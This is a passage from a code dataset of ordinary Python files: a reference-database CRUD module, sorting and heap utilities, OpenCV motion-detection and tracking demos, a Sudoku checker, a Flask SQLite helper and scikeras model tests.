db.delete(old_ref)\n db.commit()\n return new_curie\n\n\ndef merge_comments_and_corrections(db, old_reference_id, new_reference_id, old_curie, new_curie):\n\n try:\n for x in db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=old_reference_id).all():\n y = db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=new_reference_id, reference_id_to=x.reference_id_to, reference_comment_and_correction_type=x.reference_comment_and_correction_type).one_or_none()\n if y is None:\n x.reference_id_from = new_reference_id\n db.add(x)\n else:\n db.delete(x)\n for x in db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_to=old_reference_id).all():\n y = db.query(ReferenceCommentAndCorrectionModel).filter_by(reference_id_from=x.reference_id_from, reference_id_to=new_reference_id, reference_comment_and_correction_type=x.reference_comment_and_correction_type).one_or_none()\n if y is None:\n x.reference_id_to = new_reference_id\n db.add(x)\n else:\n db.delete(x)\n db.commit()\n except Exception as e:\n logger.warning(\"An error occurred when transferring the comments/corrections from \" + old_curie + \" to \" + new_curie + \" : \" + str(e))\n\n\ndef get_citation_from_args(authorNames, year, title, journal, volume, issue, page_range):\n\n if type(authorNames) == list:\n authorNames = \"; \".join(authorNames)\n\n if year is not None and not str(year).isdigit():\n year_re_result = re.search(r\"(\\d{4})\", year)\n if year_re_result:\n year = year_re_result.group(1)\n\n # Create the citation from the args given.\n citation = \"{}, ({}) {} {} {} ({}): {}\".\\\n format(authorNames, year, title,\n journal, volume, issue, page_range)\n return citation\n\n\ndef author_order_sort(author: AuthorModel):\n return author.order\n\n\ndef citation_from_data(reference_data, authorNames):\n if authorNames.endswith(\"; \"):\n authorNames = authorNames[:-2] # remove last '; '\n year = ''\n issue = ''\n volume = ''\n journal = ''\n page_range = ''\n title = ''\n if 'resource' in reference_data and reference_data[\"resource\"].title:\n journal = reference_data[\"resource\"].title\n if 'published_date' in reference_data:\n year = re.search(r\"(\\d{4})\", reference_data['date_published'])\n if not year:\n year = ''\n if 'issue' in reference_data and reference_data['issue']:\n issue = reference_data['issue']\n if 'page_range' in reference_data and reference_data['page_range']:\n page_range = reference_data['page_range']\n if 'title' in reference_data and reference_data['title']:\n title = reference_data['title']\n if not re.search('[.]$', title):\n title = title + '.'\n if 'volume' in reference_data and reference_data['volume']:\n volume = reference_data['volume']\n return get_citation_from_args(authorNames, year, title, journal, volume, issue, page_range)\n\n\ndef get_citation_from_obj(db: Session, ref_db_obj: ReferenceModel):\n\n # Authors, (year) title. Journal volume (issue): page_range\n year = ''\n if ref_db_obj.date_published:\n year_re_result = re.search(r\"(\\d{4})\", ref_db_obj.date_published)\n if year_re_result:\n year = year_re_result.group(1)\n\n title = ref_db_obj.title or ''\n if not re.search('[.]$', title):\n title = title + '.'\n\n authorNames = ''\n for author in db.query(AuthorModel).filter_by(reference_id=ref_db_obj.reference_id).order_by(AuthorModel.order).all():\n if author.name:\n authorNames += author.name + \"; \"\n authorNames = authorNames[:-2] # remove last ';'\n\n journal = ''\n if ref_db_obj.resource and ref_db_obj.resource.title:\n journal = ref_db_obj.resource.title\n\n citation = get_citation_from_args(authorNames, year, title, journal,\n ref_db_obj.volume or '',\n ref_db_obj.issue_name or '',\n ref_db_obj.page_range or '')\n return citation\n\n\ndef add_license(db: Session, curie: str, license: str): # noqa\n \"\"\"\n :param db:\n :param curie:\n :param license:\n :return:\n \"\"\"\n try:\n reference = db.query(ReferenceModel).filter_by(curie=curie).one()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with the id '{curie}' is not in the database.\")\n\n license = license.replace('+', ' ')\n copyright_license_id = None\n if license != '':\n try:\n copyrightLicense = db.query(CopyrightLicenseModel).filter_by(name=license).one()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Copyright_license with the name '{license}' is not in the database.\")\n copyright_license_id = copyrightLicense.copyright_license_id\n try:\n reference.copyright_license_id = copyright_license_id\n db.commit()\n except Exception:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Error adding license '{license}'\")\n return {\"message\": \"Update Success!\"}\n","sub_path":"agr_literature_service/api/crud/reference_crud.py","file_name":"reference_crud.py","file_ext":"py","file_size_in_byte":25633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"474098019","text":"import unittest\nimport time\n\n\ndef time_milli():\n return time.time() * 1000\n\n\ndef binary_insert(_list, item, comparator_fn):\n list_length = len(_list)\n left = 0\n right = len(_list) - 1\n mid = 0\n\n while left <= right:\n mid = round((left + right) / 2)\n comparison = comparator_fn(item, _list[mid])\n\n if comparison == 0:\n left = mid + 1\n right = mid - 1\n elif comparison == 1:\n right = mid - 1\n elif comparison == -1:\n left = mid + 1\n\n index_to_insert_at = mid\n\n if list_length > 0:\n comparison = comparator_fn(item, _list[index_to_insert_at])\n if comparison == -1:\n index_to_insert_at += 1\n\n if list_length == index_to_insert_at:\n _list.append(item)\n else:\n _list[index_to_insert_at:index_to_insert_at] = [item]\n\n return index_to_insert_at\n\n\ndef binary_search(sorted_list, item, comparator_fn):\n left = 0\n right = len(sorted_list) - 1\n\n while left <= right:\n mid = round((left + right) / 2)\n comparison = comparator_fn(item, sorted_list[mid])\n if comparison == 0:\n return mid\n elif comparison == 1:\n right = mid - 1\n elif comparison == -1:\n left = mid + 1\n return -1\n\n\ndef comparator(item, comparable):\n if item['price'] == comparable['price'] \\\n and item['exchange'] == comparable['exchange'] \\\n and item['type'] == comparable['type']:\n return 0\n\n if item['price'] < comparable['price']:\n return -1\n elif item['price'] > comparable['price']:\n return 1\n if item['type'] == 'ask' and comparable['type'] == 'bid':\n return 1\n if item['type'] == 'bid' and comparable['type'] == 'ask':\n return -1\n if item['exchange'] < comparable['exchange']:\n return -1\n if item['exchange'] > comparable['exchange']:\n return 1\n return False\n\n\nclass ArbitrageDetectorTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.item1 = {'price': 10, 'qty': 1, 'exchange': 'binance', 'type': 'bid'}\n cls.item2 = {'price': 11, 'qty': 2, 'exchange': 'binance', 'type': 'ask'}\n cls.item3 = {'price': 10, 'qty': 2, 'exchange': 'okcoin', 'type': 'ask'}\n cls.item4 = {'price': 9, 'qty': 3, 'exchange': 'bitfinex', 'type': 'bid'}\n cls.item5 = {'price': 11, 'qty': 3, 'exchange': 'kraken', 'type': 'bid'}\n\n cls.item6 = {'price': 11, 'qty': 3, 'exchange': 'bla', 'type': 'bid'}\n\n def test_comparator(self):\n self.assertEqual(comparator(self.item1, self.item2), -1)\n\n self.assertEqual(comparator(self.item1, self.item3), -1)\n\n self.assertEqual(comparator(self.item1, self.item4), 1)\n\n def test_insert(self):\n test_list = []\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n print(test_list)\n self.assertEqual(test_list[0]['price'], 11)\n self.assertEqual(test_list[0]['type'], 'ask')\n self.assertEqual(test_list[1]['price'], 11)\n self.assertEqual(test_list[1]['type'], 'bid')\n self.assertEqual(test_list[2]['price'], 10)\n self.assertEqual(test_list[2]['type'], 'ask')\n self.assertEqual(test_list[3]['price'], 10)\n self.assertEqual(test_list[3]['type'], 'bid')\n self.assertEqual(test_list[4]['price'], 9)\n self.assertEqual(test_list[4]['type'], 'bid')\n\n test_list = []\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n print(test_list)\n self.assertEqual(test_list[0]['price'], 11)\n self.assertEqual(test_list[1]['price'], 11)\n self.assertEqual(test_list[2]['price'], 10)\n self.assertEqual(test_list[3]['price'], 10)\n self.assertEqual(test_list[4]['price'], 9)\n\n def test_index_of(self):\n test_list = []\n binary_insert(test_list, self.item3, comparator)\n binary_insert(test_list, self.item2, comparator)\n binary_insert(test_list, self.item4, comparator)\n binary_insert(test_list, self.item1, comparator)\n binary_insert(test_list, self.item5, comparator)\n\n self.assertEqual(binary_search(test_list, self.item2, comparator), 0)\n self.assertEqual(binary_search(test_list, self.item5, comparator), 1)\n self.assertEqual(binary_search(test_list, self.item3, comparator), 2)\n self.assertEqual(binary_search(test_list, self.item1, comparator), 3)\n self.assertEqual(binary_search(test_list, self.item4, comparator), 4)\n self.assertEqual(binary_search(test_list, self.item6, comparator), -1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"648228258","text":"import cv2\nfrom datetime import datetime\ndef diffImg(t0, t1, t2):\n d1 = cv2.absdiff(t2, t1)\n d2 = cv2.absdiff(t1, t0)\n return cv2.bitwise_and(d1, d2)\nthreshold = 101500\ncam = cv2.VideoCapture(0)\nwinName = \"Movement Indicator\"\ncv2.namedWindow(winName)\n# Read three images first:\nt_minus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\nt = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\nt_plus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\n# Lets use a time check so we only take 1 pic per sec\ntimeCheck = datetime.now().strftime('%Ss')\nwhile True:\n cv2.imshow( winName, cam.read()[1] )\n if cv2.countNonZero(diffImg(t_minus, t, t_plus)) > threshold and timeCheck != datetime.now().strftime('%Ss'):\n dimg= cam.read()[1]\n cv2.imwrite(datetime.now().strftime('%Y%m%d_%Hh%Mm%Ss%f') + '.jpg', dimg)\n print(\"Escreveu Imagem\")\n timeCheck = datetime.now().strftime('%Ss')\n # Read next image\n t_minus = t\n t = t_plus\n t_plus = cv2.cvtColor(cam.read()[1], cv2.COLOR_RGB2GRAY)\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyWindow(winName)\n break\n","sub_path":"computacao-grafica-opencv-python/Computação Gráfica/deteccaoMovimento.py","file_name":"deteccaoMovimento.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"232991905","text":"import cv2\n\ncap = cv2.VideoCapture(0)\n\n# Capture several frames to allow the camera's autoexposure to adjust.\nfor i in range(10):\n success, frame = cap.read()\nif not success:\n exit(1)\n\n# Define an initial tracking window in the center of the frame.\nframe_h, frame_w = frame.shape[:2]\nw = frame_w//8\nh = frame_h//8\nx = frame_w//2 - w//2\ny = frame_h//2 - h//2\ntrack_window = (x, y, w, h)\n\n# Calculate the normalized HSV histogram of the initial window.\nroi = frame[y:y+h, x:x+w]\nhsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\nmask = None\nroi_hist = cv2.calcHist([hsv_roi], [0], mask, [180], [0, 180])\ncv2.normalize(roi_hist, roi_hist, 0, 255, cv2.NORM_MINMAX)\n\n# Define the termination criteria:\n# 10 iterations or convergence within 1-pixel radius.\nterm_crit = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 10, 1)\n\nsuccess, frame = cap.read()\nwhile success:\n\n # Perform back-projection of the HSV histogram onto the frame.\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n back_proj = cv2.calcBackProject([hsv], [0], roi_hist, [0, 180], 1)\n\n # Perform tracking with MeanShift.\n num_iters, track_window = cv2.meanShift(\n back_proj, track_window, term_crit)\n\n # Draw the tracking window.\n x, y, w, h = track_window\n cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)\n\n cv2.imshow('back-projection', back_proj)\n cv2.imshow('meanshift', frame)\n\n k = cv2.waitKey(1)\n if k == 27: # Escape\n break\n\n success, frame = cap.read()\n","sub_path":"chapter08/meanshift.py","file_name":"meanshift.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"132997407","text":"\n## 풀이방법\n# 1. mini_box 에서 겹치지 않는지 확인\n# 2. 가로로 겹치지 않는지 확인\n# 3. 세로로 겹치지 않는지 확인\n\nimport sys\nsys.stdin = open('SWEA_1974.txt', 'r')\n\n\ndef mini_box(arr, nr, nc):\n dr = [1, -1, 0, 0, -1, -1, 1, 1] # 상하좌우 대각선 4방향\n dc = [0, 0, -1, 1, -1, 1, 1, -1]\n\n check = [0] * 10 # 1~9까지 하나씩 들어있는지 확인하기 위한 리스트 (카운팅 정렬 앞단계)\n check[arr[nr][nc]] += 1 # 현재 값을 인덱스로 활용해 카운트\n\n for i in range(len(dr)):\n r = nr + dr[i]\n c = nc + dc[i]\n\n check[arr[r][c]] += 1\n if check[arr[r][c]] > 1:\n return False\n return True\n\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = 9\n arr = [list(map(int, input().split())) for _ in range(N)]\n\n row = True\n col = True\n box = True\n res = 0\n\n # 가로로 겹치는지 check\n for i in range(N):\n check = [0] * (N+1) # 0이 포함되진 않지만, 인덱스로 처리하므로 인덱스9 까지인 10개를 만들어야함\n for j in range(N):\n check[arr[i][j]] += 1\n if check[arr[i][j]] > 1:\n row = False\n\n # 세로로 겹치는지 check\n for j in range(N):\n check = [0] * (N+1)\n for i in range(N):\n check[arr[i][j]] += 1\n if check[arr[i][j]] > 1:\n col = False\n\n # mini_box에서 겹치는지 check\n for nr in range(1, 10, 3):\n for nc in range(1, 10, 3):\n if mini_box(arr, nr, nc) == False:\n box = False\n\n # 겹치는게 하나도 없다면 res = 1\n if row:\n if col:\n if box:\n res = 1\n\n print(f'#{tc} {res}')\n\n\n\n\n\n\n\n\n\n","sub_path":"유진/SWEA_1974(스도쿠 검증).py","file_name":"SWEA_1974(스도쿠 검증).py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"428697634","text":"import sqlite3\nfrom flask import current_app,g\nfrom app import app\n\n\ndef get_db():\n if 'db' not in g:\n g.db = sqlite3.connect(current_app.config['DATABASE'],detect_types=sqlite3.PARSE_DECLTYPES)\n g.db.row_factory =sqlite3.Row\n return g.db\n\n\ndef close_db(e = None):\n db = g.pop('db',None)\n if db is not None:\n db.close()\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef init_app(app):\n init_db()\n app.teardown_appcontext(close_db)","sub_path":"sqlitedb.py","file_name":"sqlitedb.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"299951331","text":"#!/usr/bin/env python\n#\nimport unittest\nfrom unittest.mock import Mock\n\nham = Mock() # <1>\n\n\n# system under test\nclass Spam():\n def __init__(self, param):\n self._value = ham(param) # <2>\n\n\n# dependency to be mocked -- not used in test\n# def ham(n):\n# pass\n\nclass TestSpam(unittest.TestCase): # <3>\n\n def test_spam_calls_ham(self):\n Spam(42) # <4>\n ham.assert_called_once_with(42) # <5>\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mock_basics.py","file_name":"mock_basics.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"422456589","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 25 10:52:23 2020\r\n\r\n@author: HP\r\n\"\"\"\r\n\r\nclass MaxHeap:\r\n #HeapObject class that stores that wraps the key and value.\r\n class HeapObject:\r\n def __init__(self,key,value):\r\n self.key=key\r\n self.value=value\r\n \r\n def __init__(self):\r\n self.__array=[]#initialising the heap array.\r\n \r\n #performing add Operation.\r\n def add(self,key,value=None):\r\n heapObject=self.HeapObject(key,value)\r\n self.__array.append(heapObject)\r\n self.__addOperation()\r\n \r\n #Performing Add Operation.\r\n def __addOperation(self):\r\n currentPos=len(self.__array)-1\r\n while(currentPos!=0):\r\n parentPos=self.__getParentPos(currentPos)\r\n if(not self.__check(currentPos,parentPos)):\r\n break;\r\n \r\n self.__array[currentPos],self.__array[parentPos]=self.__array[parentPos],self.__array[currentPos]\r\n currentPos=parentPos\r\n \r\n \r\n \r\n \r\n \r\n #This Method returns the parentPos of a childPosition. \r\n def __getParentPos(self,childPos):\r\n if(childPos%2==0):\r\n return childPos//2-1\r\n return childPos//2\r\n #Mwthod Checks whether parentObj is Greater than child object.\r\n def __check(self,childPos,parentPos):\r\n childObj=self.__array[childPos]\r\n parentObj=self.__array[parentPos]\r\n if(childObj.key>parentObj.key):\r\n return True\r\n return False\r\n #Method that returns the top object as a tuple and removes it.\r\n def poll(self):\r\n \r\n if(len(self.__array)==0):\r\n raise Exception(\"RunTime Exception:PriorityQueue is Empty\")\r\n \r\n heapObjectTop=self.__array[0]\r\n self.__array[0]=self.__array[len(self.__array)-1]\r\n self.__array.pop()\r\n if(len(self)>0):\r\n self.__removeOperation()\r\n \r\n if(heapObjectTop.value==None):\r\n return heapObjectTop.key\r\n return heapObjectTop.value\r\n \r\n #Method that returns the top object as a tuple\r\n def peek(self):\r\n if(len(self.__array)==0):\r\n raise Exception(\"RunTime Exception:PriorityQueue is Empty\")\r\n heapObject=self.__array[0]\r\n if(heapObject.value==None):\r\n return heapObject.key\r\n return heapObject.value\r\n \r\n #Method that performs the remove operation of a heap.\r\n def __removeOperation(self):\r\n #print(\"Inside remove operation\")\r\n currentPos=0\r\n children=self.__getChildren(currentPos)\r\n while(len(children)>0):\r\n #print(\"Inside while loop\")\r\n maxPos=self.__getMax(children)\r\n if(not self.__check(maxPos,currentPos)):\r\n break\r\n self.__array[currentPos],self.__array[maxPos]=self.__array[maxPos],self.__array[currentPos]\r\n currentPos=maxPos\r\n children=self.__getChildren(currentPos)\r\n #Method that returns the children of a parentPos\r\n def __getChildren(self,parentPos):\r\n count=self.__numberOfChildren(parentPos)\r\n if(count==2):\r\n return [2*parentPos+1,2*parentPos+2]\r\n if(count==1):\r\n return [2*parentPos+1]\r\n return []\r\n #Method that returns the number of children.\r\n def __numberOfChildren(self,parentPos):\r\n left=2*parentPos+1\r\n right=2*parentPos+2\r\n count=0\r\n if(left Model:\n # get params\n n_classes_ = meta[\"n_classes_\"]\n\n inp1 = Input((1,))\n inp2 = Input((3,))\n\n x1 = Dense(100)(inp1)\n x2 = Dense(100)(inp2)\n\n x3 = Concatenate(axis=-1)([x1, x2])\n\n cat_out = Dense(n_classes_, activation=\"softmax\")(x3)\n\n model = Model([inp1, inp2], [cat_out])\n losses = [\"sparse_categorical_crossentropy\"]\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n @property\n def feature_encoder(self):\n return FunctionTransformer(func=lambda X: [X[:, 0], X[:, 1:4]],)\n\n\nclass FunctionalAPIMultiLabelClassifier(MultiOutputClassifier):\n \"\"\"Tests Functional API Classifier with multiple binary outputs.\n \"\"\"\n\n def _keras_build_fn(\n self, meta: Dict[str, Any], compile_kwargs: Dict[str, Any],\n ) -> Model:\n # get params\n n_outputs_ = meta[\"n_outputs_\"]\n\n inp = Input((4,))\n\n x1 = Dense(100)(inp)\n\n outputs = []\n for _ in range(n_outputs_):\n # simulate multiple binary classification outputs\n # in reality, these would come from different nodes\n outputs.append(Dense(1, activation=\"sigmoid\")(x1))\n\n model = Model(inp, outputs)\n losses = \"binary_crossentropy\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n\nclass FunctionalAPIMultiOutputRegressor(KerasRegressor):\n \"\"\"Tests Functional API Regressor with multiple outputs.\n \"\"\"\n\n def _keras_build_fn(\n self, meta: Dict[str, Any], compile_kwargs: Dict[str, Any],\n ) -> Model:\n # get params\n n_outputs_ = meta[\"n_outputs_\"]\n\n inp = Input((INPUT_DIM,))\n\n x1 = Dense(100)(inp)\n\n outputs = [Dense(n_outputs_)(x1)]\n\n model = Model([inp], outputs)\n losses = \"mean_squared_error\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"mse\"])\n\n return model\n\n\ndef test_multi_input():\n \"\"\"Tests custom multi-input Keras model.\n \"\"\"\n clf = FunctionalAPIMultiInputClassifier()\n (x_train, y_train), (x_test, y_test) = get_test_data(\n train_samples=TRAIN_SAMPLES,\n test_samples=TEST_SAMPLES,\n input_shape=(4,),\n num_classes=3,\n )\n\n clf.fit(x_train, y_train)\n clf.predict(x_test)\n clf.score(x_train, y_train)\n\n\ndef test_multi_output():\n \"\"\"Compares to scikit-learn RandomForestClassifier classifier.\n \"\"\"\n\n def get_model(meta: Dict[str, Any]) -> Model:\n # get params\n n_features_in_ = meta[\"n_features_in_\"]\n\n inp = Input((n_features_in_,))\n\n x1 = Dense(100)(inp)\n\n out = [Dense(1, activation=\"sigmoid\")(x1) for _ in range(meta[\"n_outputs_\"])]\n\n model = Model([inp], out)\n losses = \"binary_crossentropy\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n clf_keras = MultiOutputClassifier(model=get_model)\n clf_sklearn = RandomForestClassifier()\n\n # generate data\n X = np.random.rand(10, 4)\n y1 = np.random.randint(0, 2, size=(10, 1))\n y2 = np.random.randint(0, 2, size=(10, 1))\n y = np.hstack([y1, y2])\n\n clf_keras.fit(X, y)\n y_wrapper = clf_keras.predict(X)\n clf_keras.score(X, y)\n\n clf_sklearn.fit(X, y)\n y_sklearn = clf_sklearn.predict(X)\n\n assert y_sklearn.shape == y_wrapper.shape\n\n\ndef test_multi_label_clasification():\n \"\"\"Compares to scikit-learn RandomForestClassifier classifier.\n \"\"\"\n clf_keras = FunctionalAPIMultiLabelClassifier()\n clf_sklearn = RandomForestClassifier()\n # taken from https://scikit-learn.org/stable/modules/multiclass.html\n y = [[2, 3, 4], [2], [0, 1, 3], [0, 1, 2, 3, 4], [0, 1, 2]]\n y = MultiLabelBinarizer().fit_transform(y)\n\n (x_train, _), (_, _) = get_test_data(\n train_samples=y.shape[0], test_samples=0, input_shape=(4,), num_classes=3,\n )\n\n clf_keras.fit(x_train, y)\n y_pred_keras = clf_keras.predict(x_train)\n clf_keras.score(x_train, y)\n\n clf_sklearn.fit(x_train, y)\n y_pred_sklearn = clf_sklearn.predict(x_train)\n clf_sklearn.score(x_train, y)\n\n assert y_pred_keras.shape == y_pred_sklearn.shape\n\n\ndef test_multi_output_regression():\n \"\"\"Compares to scikit-learn RandomForestRegressor.\n \"\"\"\n reg_keras = FunctionalAPIMultiOutputRegressor()\n reg_sklearn = RandomForestRegressor()\n # taken from https://scikit-learn.org/stable/modules/multiclass.html\n (X, _), (_, _) = get_test_data(\n train_samples=TRAIN_SAMPLES,\n test_samples=TEST_SAMPLES,\n input_shape=(INPUT_DIM,),\n num_classes=NUM_CLASSES,\n )\n y = np.random.random_sample(size=(TRAIN_SAMPLES, NUM_CLASSES))\n\n reg_keras.fit(X, y)\n y_pred_keras = reg_keras.predict(X)\n reg_keras.score(X, y)\n\n reg_sklearn.fit(X, y)\n y_pred_sklearn = reg_sklearn.predict(X)\n reg_sklearn.score(X, y)\n\n assert y_pred_keras.shape == y_pred_sklearn.shape\n\n\n@pytest.mark.parametrize(\n \"y, y_type\",\n [\n (np.array([1, 2, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (np.array([2, 1, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (\n np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]),\n \"multilabel-indicator\",\n ), # one-hot encoded\n (np.array([\"a\", \"b\", \"c\"]), \"multiclass\"), # categorical\n ],\n)\ndef test_KerasClassifier_loss_invariance(y, y_type):\n \"\"\"Test that KerasClassifier can use both\n categorical_crossentropy and sparse_categorical_crossentropy\n with either one-hot encoded targets or sparse targets.\n \"\"\"\n X = np.arange(0, y.shape[0]).reshape(-1, 1)\n clf_1 = KerasClassifier(\n model=dynamic_classifier,\n hidden_layer_sizes=(100,),\n loss=\"categorical_crossentropy\",\n random_state=0,\n )\n clf_1.fit(X, y)\n clf_1.partial_fit(X, y)\n y_1 = clf_1.predict(X)\n if y_type != \"multilabel-indicator\":\n # sparse_categorical_crossentropy is not compatible with\n # one-hot encoded targets, and one-hot encoded targets are not used in sklearn\n # This is a use case that does not natively succeed in Keras or skelarn estimators\n # and thus SciKeras does not intend to auto-convert data to support it\n clf_2 = KerasClassifier(\n model=dynamic_classifier,\n hidden_layer_sizes=(100,),\n loss=\"sparse_categorical_crossentropy\",\n random_state=0,\n )\n clf_2.fit(X, y)\n y_2 = clf_1.predict(X)\n\n np.testing.assert_equal(y_1, y_2)\n\n\n@pytest.mark.parametrize(\n \"y, y_type\",\n [\n (np.array([1, 2, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (np.array([2, 1, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (\n np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]),\n \"multilabel-indicator\",\n ), # one-hot encoded\n (np.array([\"a\", \"b\", \"c\"]), \"multiclass\"), # categorical\n ],\n)\n@pytest.mark.parametrize(\n \"loss\", [\"categorical_crossentropy\", \"sparse_categorical_crossentropy\"]\n)\ndef test_KerasClassifier_transformers_can_be_reused(y, y_type, loss):\n \"\"\"Test that KerasClassifier can use both\n categorical_crossentropy and sparse_categorical_crossentropy\n with either one-hot encoded targets or sparse targets.\n \"\"\"\n if y_type == \"multilabel-indicator\" and loss == \"sparse_categorical_crossentropy\":\n return # not compatible, see test_KerasClassifier_loss_invariance\n X1, y1 = np.array([[1, 2, 3]]).T, np.array([1, 2, 3])\n clf = KerasClassifier(\n model=dynamic_classifier, hidden_layer_sizes=(100,), loss=loss, random_state=0,\n )\n clf.fit(X1, y1)\n tfs = clf.target_encoder_\n X2, y2 = X1, np.array([1, 1, 1]) # only 1 out or 3 classes\n clf.partial_fit(X2, y2)\n tfs_new = clf.target_encoder_\n assert tfs_new is tfs # same transformer was re-used\n assert set(clf.classes_) == set(y1)\n\n\ndef test_incompatible_output_dimensions():\n \"\"\"Compares to the scikit-learn RandomForestRegressor classifier.\n \"\"\"\n # create dataset with 4 outputs\n X = np.random.rand(10, 20)\n y = np.random.randint(low=0, high=3, size=(10,))\n\n # create a model with 2 outputs\n def build_fn_clf(meta: Dict[str, Any], compile_kwargs: Dict[str, Any],) -> Model:\n # get params\n n_features_in_ = meta[\"n_features_in_\"]\n\n inp = Input((n_features_in_,))\n\n x1 = Dense(100)(inp)\n\n binary_out = Dense(1, activation=\"sigmoid\")(x1)\n cat_out = Dense(2, activation=\"softmax\")(x1)\n\n model = Model([inp], [binary_out, cat_out])\n model.compile(loss=[\"binary_crossentropy\", \"categorical_crossentropy\"])\n\n return model\n\n clf = KerasClassifier(model=build_fn_clf)\n\n with pytest.raises(ValueError, match=\"input of size\"):\n clf.fit(X, y)\n\n\n@pytest.mark.parametrize(\n \"dtype\", [\"float32\", \"float64\", \"int64\", \"int32\", \"uint8\", \"uint16\", \"object\"],\n)\ndef test_classifier_handles_dtypes(dtype):\n \"\"\"Tests that classifiers correctly handle dtype conversions and\n return the same dtype as the inputs.\n \"\"\"\n n, d = 20, 3\n n_classes = 3\n X = np.random.uniform(size=(n, d)).astype(dtype)\n y = np.random.choice(n_classes, size=n).astype(dtype)\n sample_weight = np.ones(y.shape).astype(dtype)\n\n class StrictClassifier(KerasClassifier):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(dtype)\n # y is passed through encoders, it is likely not the original dtype\n # sample_weight should always be floatx\n assert sample_weight.dtype == np.dtype(tf.keras.backend.floatx())\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n clf = StrictClassifier(model=dynamic_classifier, model__hidden_layer_sizes=(100,))\n clf.fit(X, y, sample_weight=sample_weight)\n assert clf.score(X, y) >= 0\n if y.dtype.kind != \"O\":\n assert clf.predict(X).dtype == np.dtype(dtype)\n else:\n assert clf.predict(X).dtype == np.float32\n\n\n@pytest.mark.parametrize(\n \"dtype\", [\"float32\", \"float64\", \"int64\", \"int32\", \"uint8\", \"uint16\", \"object\"],\n)\ndef test_regressor_handles_dtypes(dtype):\n \"\"\"Tests that regressors correctly handle dtype conversions and\n always return float dtypes.\n \"\"\"\n n, d = 20, 3\n X = np.random.uniform(size=(n, d)).astype(dtype)\n y = np.random.uniform(size=n).astype(dtype)\n sample_weight = np.ones(y.shape).astype(dtype)\n\n class StrictRegressor(KerasRegressor):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n assert y.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(dtype)\n assert y.dtype == np.dtype(dtype)\n # sample_weight should always be floatx\n assert sample_weight.dtype == np.dtype(tf.keras.backend.floatx())\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n reg = StrictRegressor(model=dynamic_regressor, model__hidden_layer_sizes=(100,))\n reg.fit(X, y, sample_weight=sample_weight)\n y_hat = reg.predict(X)\n if y.dtype.kind == \"f\":\n assert y_hat.dtype == np.dtype(dtype)\n else:\n assert y_hat.dtype.kind == \"f\"\n\n\n@pytest.mark.parametrize(\"X_dtype\", [\"float32\", \"int64\"])\n@pytest.mark.parametrize(\"y_dtype,\", [\"float32\", \"float64\", 